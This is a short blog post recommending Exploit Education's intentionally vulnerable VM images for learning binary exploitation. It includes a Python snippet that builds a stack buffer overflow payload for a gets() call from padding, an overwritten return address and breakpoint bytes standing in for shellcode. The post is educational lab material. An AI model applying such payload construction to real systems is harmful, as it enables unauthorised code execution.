Exploit Education
Best way to learn systems
The webiste is here. It has vulnerable virtual machine images which can be mounted and booted using qemu. I got to know about this particular resource by this amazing playlist on binary exploitation by Live Overflow.
The machines have all the modern security features (like ASLR) disabled by default, hence the focus is primarily on cracking binaries. Some of the snippets which helped in cracking them are listed below.
# affects the following pattern:
# gets(buffer);
# return 0;
# }
import struct
# padding to find input offset for the binary
padding="AAAABBBBCCCCDDDDEEEEFFFF"
# instruction to return to (leave instruction at end of main)
eip = struct.pack("I",0x7fffffffdba8)
# nopslide
nopslide = "\x90"*100
# shellcode (execve bin/dash)
# \xCC is the opcode to generate breakpoint trap (very useful while cracking the binary inside gdb)
# check references
payload = "\xCC" * 4
exploit = padding+eip+payload
print(exploit)